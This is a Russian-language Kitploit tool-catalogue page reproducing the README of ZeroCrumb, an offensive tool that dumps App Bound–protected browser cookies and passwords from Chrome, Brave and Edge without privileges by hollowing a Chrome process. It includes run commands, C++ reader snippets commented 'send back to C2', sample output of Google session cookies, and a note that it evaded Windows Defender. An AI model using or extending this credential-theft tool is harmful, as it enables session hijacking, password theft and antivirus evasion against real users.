Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ZeroCrumb — Извлечение защищённых App Bound учётных данных и файлов cookie без привилегий. | Kitploit
Инструменты/GitHubGitHub/internetangel/zerocrumb
Взлом паролейЭксплуатацияЛатеральное перемещениеЭксфильтрация данныхПост-эксплуатацияВеб-безопасностьАнализ вредоносных программКомандование и УправлениеRed Teaming
GitHubinternetangel/zerocrumb

ZeroCrumb

Извлечение защищённых App Bound учётных данных и файлов cookie без привилегий.

169181 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

ZeroCrumb

Дамп защищённых App Bound учётных данных и файлов cookie без привилегий.

Пояснение

ZeroCrumb обходит службу Chrome Elevation Service, выдавая себя за экземпляр Chrome с помощью Transacted Hollowing, что позволяет использовать COM-интерфейс IElevator для расшифровки ключа App Bound.

Затем дампер ключа, работающий внутри подменённого экземпляра Chrome, отправляет расшифрованный ключ обратно в ZeroCrumb через именованный канал.

После этого ZeroCrumb расшифровывает файлы cookie/пароли указанного браузера с помощью полученного ранее ключа.

Преимущества подхода с именованными каналами

Использование именованных каналов в ZeroCrumb позволяет любой программе, умеющей работать с Windows API, подключиться к именованному каналу ZeroCrumb и прочитать из него ключ App Bound.

Использование ZeroCrumb в качестве библиотеки

Если вы хотите использовать ZeroCrumb в качестве библиотеки, вам потребуется скомпилировать DLL, экспортирующую функцию, которая выполняет холлоуинг Chrome с помощью дампера ключа. Возможно, также потребуется встроить PE-файл дампера ключа в секцию .rsrc скомпилированной DLL и затем извлекать его с помощью Windows API для ресурсов приложения.

Использование

Вы можете запускать это в любой выбранной вами директории, главное, чтобы дампер ключа находился в той же директории.

root@kitploit:~
ZeroCrumb.exe <BROWSER_TYPE> <DUMP_TYPE>
root@kitploit:~
Browser Types:
Chrome -> 0
Brave -> 1
Edge -> 2

Dump Types:
Cookies
Passwords

Использование в коде

ZeroCrumb предоставляет простые в использовании классы CookieReader и PasswordReader:

root@kitploit:~
    auto reader = new CookieReader(cookiesPath.c_str(), key);

    reader->initSqliteDb();
    reader->prepare(queries::cookies);
    reader->populateCookies();
    
    for (auto& cookie : reader->cookies) {
        string name = cookie->name;
        string site = cookie->site;
        string path = cookie->path;
        string cookieValue = cookie->cookie;
        // dump to file, send back to C2, etc...
    }
root@kitploit:~
    // keep in mind passwords aren't encrypted using the app bound key (yet)
    auto reader = new PasswordReader(passwordsPath.c_str(), key);

    reader->initSqliteDb();
    reader->prepare(queries::passwords);
    reader->populatePasswords();

    for (auto& password : reader->passwords) {

      auto name = password->name;
      auto site = password->site;
      auto passwordValue = password->password;
      // dump to file, send back to C2, etc...
    }

Зависимости

ZeroCrumb требует две зависимости Vcpkg:

root@kitploit:~
sqlite3
libsodium

Пример вывода

root@kitploit:~
$ ZeroCrumb.exe 0 Cookies
[*] Reading From Pipe...
App Bound Key: 980f8ea8af3299d966a26242.....
============
Name: SIDCC
Site: .google.com
Path: /
Cookie: AKEyXzXxD19T0KLMkrMC-eUXkrnEFi92OXq6rj1vydvmdL73olBVQGRQ4cG_hK5sqPhO1rLd1CM
============
Name: __Secure-1PSIDCC
Site: .google.com
Path: /
Cookie: AKEyXzXXC8_MNDlVbAaw512aXu-QJkl0uKNW66rhjeufotzoJhT3OPN5TuCQnfKS8l57_WGfDw
============
Name: __Secure-3PSIDCC
Site: .google.com
Path: /
Cookie: AKEyXzVVySM4FWl9itegCN2evcSmBvGc7_iXHqkKZ6VYPKmR--_LsHx1Aflar6SU4nyJiDaFq028
============
Name: udid
Site: .veepn.com
Path: /
Cookie: 0dd5b8bb-8c5b-47f3-87f9-1db8fa7d885f
============

Примечания

Вы можете модифицировать ZeroCrumb для работы с любым типом учётных данных, а не только с файлами cookie и паролями.

Проблемы

  • В Debug-сборке не выводится корректный ключ

Дисклеймер

Это ни в коем случае не самая скрытная реализация данного обхода: его можно обнаружить по наличию специфических строк, перехвату API и т. д.

На момент моего тестирования он обходил Windows Defender, но другие антивирусы я не проверял.

Если эта реализация обхода в будущем попадёт в сигнатуры, я оставлю повышение её скрытности в качестве упражнения для пользователя.

Благодарности

Transacted Hollowing от hasherezade.

App Bound Encryption Decryption от Xaitax.

Скачать инструмент